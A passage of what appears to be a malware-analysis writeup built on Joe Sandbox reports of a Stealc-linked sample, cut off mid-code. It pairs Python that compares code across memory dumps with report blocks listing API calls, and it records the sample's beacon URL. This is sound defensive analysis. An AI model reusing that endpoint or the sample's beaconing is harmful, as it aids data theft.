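            ".00000040.00001000.00020000.00000000.sdmp")

OP_LOCALE_A = "e4ce11b37ce44f7ba8e9afc7401a0a9b198b24000e5175f43f23aaf661957535"
OP_LOCALE_B = "80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd"
OP_LOCALE_C = "4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240"
OP_FREE = "709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec"

RECORDS = [
    # std::locale facet helpers, main image only
    {"source": MAIN_SRC, "offset": "00400000", "opcode_id": OP_LOCALE_A,
     "instruction_id": "335d1a0449174c4850433ac7d89b0c6b75dcf3c5386a47d7b2396d3cdec16656"},
    # same opcode sequence in both dumps, operands differ
    {"source": MAIN_SRC, "offset": "00400000", "opcode_id": OP_LOCALE_B,
     "instruction_id": "7f60e392e4a430ae1f2c93b626e46d5b6b74a1b844d6ec56694562dd50cc071c"},
    {"source": HEAP_SRC, "offset": "03010000", "opcode_id": OP_LOCALE_B,
     "instruction_id": "a882a1cfbee5abdc9be15c71447a949f8f568d17cf667afb1cc38025a1765ff0"},
    # facet helper seen only in the unpacked region
    {"source": HEAP_SRC, "offset": "03010000", "opcode_id": OP_LOCALE_C,
     "instruction_id": "ee99ebb54650bfc668cec6ce073369031f421b64970e3526692b29f109cb7a1b"},
    # _free wrapper present in both dumps
    {"source": MAIN_SRC, "offset": "00400000", "opcode_id": OP_FREE,
     "instruction_id": "2269d71fc1307fb615fcd26a16e66de3d258f5a42cea17c2f792775dd2d74ff0"},
    {"source": HEAP_SRC, "offset": "03010000", "opcode_id": OP_FREE,
     "instruction_id": "152d4ad650f78ec8487043b466758830a206fee9e601dafc91fab970e94c20e5"},
]


def dump_base(source: str) -> int:
    """Base address encoded in the fourth dot-separated field of an .sdmp name."""
    return int(source.split(".")[3], 16)


def check_offsets(records) -> bool:
    """Every block's Offset must agree with the base in its Source File name."""
    return all(dump_base(r["source"]) == int(r["offset"], 16) for r in records)


def shared_opcodes(records) -> dict:
    """Opcode IDs seen in more than one dump, mapped to the sorted list of dump bases."""
    seen = defaultdict(set)
    for r in records:
        seen[r["opcode_id"]].add(r["offset"])
    return {op: sorted(b) for op, b in seen.items() if len(b) > 1}


def exact_duplicates(records) -> set:
    """Shared Opcode IDs whose Instruction ID is also identical everywhere
    (function byte-for-byte identical, operands included)."""
    instr = defaultdict(set)
    for r in records:
        instr[r["opcode_id"]].add(r["instruction_id"])
    return {op for op in shared_opcodes(records) if len(instr[op]) == 1}


def coverage(records, offset: str) -> float:
    """Share of one dump's functions whose Opcode ID also occurs in another dump.
    Close to 1.0 suggests the region is largely a copy of already-seen code."""
    mine = {r["opcode_id"] for r in records if r["offset"] == offset}
    if not mine:
        return 0.0
    return len(mine & set(shared_opcodes(records))) / len(mine)


if __name__ == "__main__":
    assert check_offsets(RECORDS)
    for op, bases in shared_opcodes(RECORDS).items():
        print(f"{op[:16]}... shared by {', '.join(bases)}")
    print("identical operands too:", exact_duplicates(RECORDS) or "none")
    print(f"unpacked-region overlap with main image: {coverage(RECORDS, '03010000'):.2f}")
```

With only the blocks on this page the overlap is two of three functions per dump; run over the full set of report blocks the same grouping tells you how much of the region at 03010000 is loader/CRT code already present at 00400000 and how much is payload-only, which is where the Stealc-specific functions will be.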
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D11A,00000000,00000000,0042D958,?,0042D958,?,00000001,0042D11A,23E85006,00000001,0042D958,0042D958), ref: 0043690A
                                                  • __alloca_probe_16.LIBCMT ref: 00436942
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436993
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004369A5
                                                  • __freea.LIBCMT ref: 004369AE
                                                    • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                  • String ID:
                                                  • API String ID: 313313983-0
                                                  • Opcode ID: 3e8a2e8aab748589cebb1bfb4cc7bc8f0b8dcb51511829ebe5bc338c40e17782
                                                  • Instruction ID: 564015b8663966f91a736df8c1f199cffa5732d11cc50b43fea489f3b547491b
                                                  • Opcode Fuzzy Hash: 3e8a2e8aab748589cebb1bfb4cc7bc8f0b8dcb51511829ebe5bc338c40e17782
                                                  • Instruction Fuzzy Hash: 0A31CE72A0020AAFDF249F65CC41EAF7BA5EF44714F16422AFC04D6290EB39CD54CB98
                                                  APIs
                                                  • _SpinWait.LIBCONCRT ref: 0041AF0B
                                                    • Part of subcall function 00410F41: _SpinWait.LIBCONCRT ref: 00410F59
                                                  • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AF1F
                                                  • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF51
                                                  • List.LIBCMT ref: 0041AFD4
                                                  • List.LIBCMT ref: 0041AFE3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                  • String ID:
                                                  • API String ID: 3281396844-0
                                                  • Opcode ID: 1637b491240e50c5e643825cbab1343b8211ccee4cd56710176c1192e2ab3ef7
                                                  • Instruction ID: 96d9cd947b213099fbcac924e0358b3b7b3cf073485a4601a3d8c747dc036099
                                                  • Opcode Fuzzy Hash: 1637b491240e50c5e643825cbab1343b8211ccee4cd56710176c1192e2ab3ef7
                                                  • Instruction Fuzzy Hash: 8C318971D02656DFCB14EFA5C5816EEBBB1BF04308F04006FE80167292DB786DA5CB9A
                                                  APIs
                                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402086
                                                  • GdipAlloc.GDIPLUS(00000010), ref: 0040208E
                                                  • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 004020A9
                                                  • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020D3
                                                  • GdiplusShutdown.GDIPLUS(?), ref: 004020FF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                  • String ID:
                                                  • API String ID: 2357751836-0
                                                  • Opcode ID: 217f5abb5afa1b455eb2dbd7401cc4696c8519af6d5153b3f711d937d629bad7
                                                  • Instruction ID: c4f18e326f444715a52338ef43c677910c1406114480214147ef42e81c070973
                                                  • Opcode Fuzzy Hash: 217f5abb5afa1b455eb2dbd7401cc4696c8519af6d5153b3f711d937d629bad7
                                                  • Instruction Fuzzy Hash: 4D2151B5A0031AAFDB10DFA5DD499AFFBB9FF48741B104036E906E3290D7759901CBA8
                                                  APIs
                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 030150C8
                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 030150DC
                                                    • Part of subcall function 0301BDD3: __EH_prolog3_GS.LIBCMT ref: 0301BDDA
                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 03015141
                                                  • __Getcoll.LIBCPMT ref: 03015150
                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 03015160
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
                                                  • String ID:
                                                  • API String ID: 1844465188-0
                                                  • Opcode ID: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                  • Instruction ID: f96517384d53e5b795a0bb56f93c933fea944f9c1526e025bd72ea0eaa97feab
                                                  • Opcode Fuzzy Hash: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                  • Instruction Fuzzy Hash: 5821CDB5802318EFEB41EFA4C880BDDBBB0BF84310F448419D485AF280EBB49A54CB91
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                  • _free.LIBCMT ref: 00431FB8
                                                  • _free.LIBCMT ref: 00431FDF
                                                  • SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                  • SetLastError.KERNEL32(00000000), ref: 00431FF5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                  • Instruction ID: 1e3cd072d0496c43a3242b2b2daca3b64790c0c87830b362050c04c7c8c4abe4
                                                  • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                  • Instruction Fuzzy Hash: 2101F936149A007BD61227255C45D6B262DABD977AF20212FF815933E2EFAD8906412D
                                                  APIs
                                                  • GetLastError.KERNEL32(0301DAFC,0301DAFC,00000002,0303ED55,03043971,00000000,?,03036A25,00000002,00000000,00000000,00000000,?,0301CFAD,0301DAFC,00000004), ref: 030421EA
                                                  • _free.LIBCMT ref: 0304221F
                                                  • _free.LIBCMT ref: 03042246
                                                  • SetLastError.KERNEL32(00000000,?,0301DAFC), ref: 03042253
                                                  • SetLastError.KERNEL32(00000000,?,0301DAFC), ref: 0304225C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                  • Instruction ID: abf95574bf99d84cab7e4428f36d5e12e4d8ef5856c16dce5085f797445f75c4
                                                  • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                  • Instruction Fuzzy Hash: 5C0149FA30770477C212E7346D84E6F229DFFC2A737140978F51196280EEA08B124029
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                  • _free.LIBCMT ref: 00431F31
                                                  • _free.LIBCMT ref: 00431F59
                                                  • SetLastError.KERNEL32(00000000), ref: 00431F66
                                                  • SetLastError.KERNEL32(00000000), ref: 00431F72
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                  • Instruction ID: 89f26f5adfa52999dd97e159cd61ed3cb5fd8874f2961931db20f525c950a72a
                                                  • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                  • Instruction Fuzzy Hash: 0AF02D3A50CA0037D61637356C06B5F26199FD9B67F30212FF814923F2EF6D8806412D
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                  • _free.LIBCMT ref: 03042198
                                                  • _free.LIBCMT ref: 030421C0
                                                  • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421CD
                                                  • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                  • Instruction ID: dce7037b8c15760803852c4db82cdac8750db02a0d5cbec19b209b0d3fb37b35
                                                  • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                  • Instruction Fuzzy Hash: 3CF0F9FE24770137C251F328BC09B5E265D9FD2A63B150534F914D62E0EE60C7124529
                                                  APIs
                                                    • Part of subcall function 0041275D: TlsGetValue.KERNEL32(?,?,00410B7B,00412C88,00000000,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412763
                                                  • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041796A
                                                    • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FFA
                                                    • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00421013
                                                    • Part of subcall function 00420FD3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421089
                                                    • Part of subcall function 00420FD3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421091
                                                  • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417978
                                                  • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417982
                                                  • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041798C
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004179AA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                  • String ID:
                                                  • API String ID: 4266703842-0
                                                  • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                  • Instruction ID: 8cd570ce40639c9f8c017ae24bf7a6ba5e4898ad5d78eaa9f9672d2de087314b
                                                  • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                  • Instruction Fuzzy Hash: 0BF04671A0422867CE15B7229812AEEB72A9F90718F40012FF41093283DF6C9E9986CD
                                                  APIs
                                                    • Part of subcall function 030229C4: TlsGetValue.KERNEL32(?,?,03020DE2,03022EEF,00000000,?,03020DC0,?,?,?,00000000,?,00000000), ref: 030229CA
                                                  • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 03027BD1
                                                    • Part of subcall function 0303123A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 03031261
                                                    • Part of subcall function 0303123A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0303127A
                                                    • Part of subcall function 0303123A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 030312F0
                                                    • Part of subcall function 0303123A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 030312F8
                                                  • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 03027BDF
                                                  • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 03027BE9
                                                  • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 03027BF3
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03027C11
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                  • String ID:
                                                  • API String ID: 4266703842-0
                                                  • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                  • Instruction ID: 06a4d338f10dcb15f70b4874f590a2e2305cd90d08ca0bfc5942635ebe7fff9a
                                                  • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                  • Instruction Fuzzy Hash: 8BF0F63DA023386BCE26F3759810AAEFF6E9FC1A20B04416AE4115B250DF259B1587C5
                                                  APIs
                                                  • _free.LIBCMT ref: 00439E7D
                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                  • _free.LIBCMT ref: 00439E8F
                                                  • _free.LIBCMT ref: 00439EA1
                                                  • _free.LIBCMT ref: 00439EB3
                                                  • _free.LIBCMT ref: 00439EC5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                  • Instruction ID: 3df159f09b4f07c7f9cd4576f3114e9092ca915295917fe09ca5bd5d66e4921a
                                                  • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                  • Instruction Fuzzy Hash: 61F04F32409200ABC620EB59E483C1773D9BB08712F686A4FF04CDB751CBBAFC808A5D
                                                  APIs
                                                  • _free.LIBCMT ref: 0304A0E4
                                                    • Part of subcall function 030436F1: HeapFree.KERNEL32(00000000,00000000,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?), ref: 03043707
                                                    • Part of subcall function 030436F1: GetLastError.KERNEL32(?,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?,?), ref: 03043719
                                                  • _free.LIBCMT ref: 0304A0F6
                                                  • _free.LIBCMT ref: 0304A108
                                                  • _free.LIBCMT ref: 0304A11A
                                                  • _free.LIBCMT ref: 0304A12C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                  • Instruction ID: 4c622102af12adcd3d278a54835b663a5e636dbc89b01b71cef63ff6ced56c30
                                                  • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                  • Instruction Fuzzy Hash: 9EF068B65473006BC5A0EB5CF4C2C46B3D9AA40391B584965F014DB710CF71FDA08A59
                                                  APIs
                                                  • _free.LIBCMT ref: 00431768
                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                  • _free.LIBCMT ref: 0043177A
                                                  • _free.LIBCMT ref: 0043178D
                                                  • _free.LIBCMT ref: 0043179E
                                                  • _free.LIBCMT ref: 004317AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                  • Instruction ID: 59d86e5f81b59af28f084099f89460b905b5d9e26065712495255f22da63edd4
                                                  • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                  • Instruction Fuzzy Hash: 01F03070C003109B9A226F25AC414553B60AF2D727F04636FF4069B273C77ADA52DF8E
                                                  APIs
                                                  • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCEF
                                                  • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD20
                                                  • GetCurrentThread.KERNEL32 ref: 0041CD29
                                                  • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD3C
                                                  • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                  • String ID:
                                                  • API String ID: 2583373041-0
                                                  • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                  • Instruction ID: c40835f97e64ecf2e035c3ed6e644cfe8c904edaac08ffe142c14ca74381b7ad
                                                  • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                  • Instruction Fuzzy Hash: 81F0AE762406109B8625FF11FD518F777759FC4715300051FE44B47551CF28A9C1D7A6
                                                  APIs
                                                  • _free.LIBCMT ref: 030419CF
                                                    • Part of subcall function 030436F1: HeapFree.KERNEL32(00000000,00000000,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?), ref: 03043707
                                                    • Part of subcall function 030436F1: GetLastError.KERNEL32(?,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?,?), ref: 03043719
                                                  • _free.LIBCMT ref: 030419E1
                                                  • _free.LIBCMT ref: 030419F4
                                                  • _free.LIBCMT ref: 03041A05
                                                  • _free.LIBCMT ref: 03041A16
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                  • Instruction ID: e62d83e5fe4cfcc7d47dc7009fe0d8ef6ab6f9b040ca998fea84c3e9bd43f8a0
                                                  • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                  • Instruction Fuzzy Hash: 27F05BB8C013125BCEA1BF14BC814447B60EF0966270452B6F4129B372CB74DAB2DF8E
                                                  APIs
                                                  • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0302CF56
                                                  • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0302CF87
                                                  • GetCurrentThread.KERNEL32 ref: 0302CF90
                                                  • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0302CFA3
                                                  • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0302CFAC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                  • String ID:
                                                  • API String ID: 2583373041-0
                                                  • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                  • Instruction ID: 4c16fdee918c6006098b37853c977795c28cf62169faf5c567a378ca790f74a7
                                                  • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                  • Instruction Fuzzy Hash: 87F0A73A2027209BC665FF20F9508FF7FB59FC4510300058DE5970A554CF25A906D721
                                                  APIs
                                                  • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 03012EAE
                                                    • Part of subcall function 03011321: _wcslen.LIBCMT ref: 03011328
                                                    • Part of subcall function 03011321: _wcslen.LIBCMT ref: 03011344
                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 030130C6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InternetOpen_wcslen
                                                  • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                  • API String ID: 3381584094-4083784958
                                                  • Opcode ID: f722d498d47d2f0aeabff3c67fdeace8084b2a701aad829f7b28d117417d8525
                                                  • Instruction ID: 6b883939a5f70a83333d2e8320c8988a4d8a6b85c4e95a68b575c080b2cdb688
                                                  • Opcode Fuzzy Hash: f722d498d47d2f0aeabff3c67fdeace8084b2a701aad829f7b28d117417d8525
                                                  • Instruction Fuzzy Hash: 23517495A66344A8E320DFB0BC52B753378EF58712F10643BE518CB2B2E7B19944875E
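The function above opens a WinINet session and fetches a URL assembled from wide strings (InternetOpenW, InternetOpenUrlW, _wcslen), two of which the report recovered: https://post-to-me.com/track_prt.php?sub= and &cc=DE. As an added example, not code from the sample or from the Joe Sandbox report, the following Python carves UTF-16LE strings out of a dump-like byte buffer and separates full URLs from loose query-string fragments. The buffer is constructed inside the script (in practice you would read the .sdmp files named under Memory Dump Source); the reading of cc as a country-code parameter and the helper names are my own.

```python
import re

# The two wide-string fragments the report recovered for this function.
URL_PREFIX = "https://post-to-me.com/track_prt.php?sub="
CC_SUFFIX = "&cc=DE"        # reads like a country-code parameter (assumption)


def build_fake_dump() -> bytes:
    """Constructed stand-in for a memory dump; not bytes from the real .sdmp."""
    noise = bytes(range(0x80, 0x100)) * 2        # nothing printable in here
    return (noise
            + URL_PREFIX.encode("utf-16-le") + b"\x00\x00"
            + b"\x90" * 13                       # odd-length gap: strings need not be 2-byte aligned
            + CC_SUFFIX.encode("utf-16-le") + b"\x00\x00"
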